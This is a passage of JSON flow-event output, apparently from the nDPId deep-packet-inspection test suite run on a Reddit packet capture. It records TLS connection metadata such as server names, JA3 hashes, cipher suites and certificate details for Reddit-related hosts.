{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
-01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
-01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
-01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 